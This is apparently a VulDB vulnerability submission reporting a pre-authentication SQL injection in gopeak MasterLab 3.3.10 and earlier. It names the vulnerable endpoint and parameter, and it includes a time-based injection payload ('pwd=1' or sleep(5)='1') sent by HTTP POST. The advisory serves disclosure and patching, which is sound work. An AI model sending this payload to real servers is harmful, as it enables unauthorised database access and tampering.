Submit #258782: gopeak MasterLab ≤v3.3.10 Pre-Auth SQL Injectioninfo

Titlegopeak MasterLab ≤v3.3.10 Pre-Auth SQL Injection
DescriptionMasterLab is a project management tool that offers task management, issue tracking, and team collaboration features through its web platform. A pre-authentication SQL injection vulnerability has been identified in an earlier version of MasterLab (version 3.3.10 and below). This vulnerability is located in the sqlInject function within the app/ctrl/framework/Feature.php file. The sqlInject function fails to properly sanitize or escape the user-supplied pwd parameter, allowing an attacker to construct malicious SQL queries to manipulate the database. The presence of the vulnerability may be due to the developers creating this piece of code for testing purposes but then forgetting to remove it. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the /framework/feature/sqlInject endpoint with malicious SQL code, such as pwd=1' or sleep(5)='1, which would cause the database to execute the sleep function, resulting in a 5-second response delay. This delay indicates the successful execution of an SQL injection attack. The exploitation of this vulnerability does not require the attacker to be authenticated, hence it is classified as a pre-authentication SQL injection vulnerability. Since this vulnerability could allow unauthorized attackers to execute arbitrary SQL statements, it could lead to sensitive data exposure, data tampering, or even full database compromise. Therefore, it is considered a critical security issue that requires immediate attention. Users of MasterLab v3.3.10 and below are advised to upgrade to the latest version as soon as possible to mitigate potential security risks.
Source⚠️ https://note.zhaoj.in/share/4HDWrBHGCf9e
User
 glzjin (UID 59815)
Submission12/27/2023 10:39 (2 years ago)
Moderation12/28/2023 09:33 (23 hours later)
StatusAccepted
VulDB entry249147 [gopeak MasterLab up to 3.3.10 HTTP POST Request Feature.php sqlInject pwd sql injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!